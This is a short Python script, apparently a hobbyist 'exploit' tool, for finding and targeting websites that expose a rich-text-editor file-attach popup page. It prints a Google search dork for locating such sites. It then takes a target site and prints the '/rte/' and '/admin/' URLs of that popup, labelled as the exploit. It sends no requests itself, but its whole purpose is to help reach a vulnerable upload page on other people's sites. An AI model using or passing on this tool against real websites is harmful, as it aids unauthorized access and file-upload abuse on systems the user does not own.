print('`````````````````````````````````')
print('bug rte','coding by m0bindan')
print('DORK:inurl:RTE_POPUP_file_atch.asp')
print('``````````````````````````````````')
x =input('enter your sit: ')
print('{exploit}:',x+'/rte/RTE_POPUP_file_atch.asp')
print('or')
print('{exploit}:',x+'/admin/RTE_POPUP_file_atch.asp')
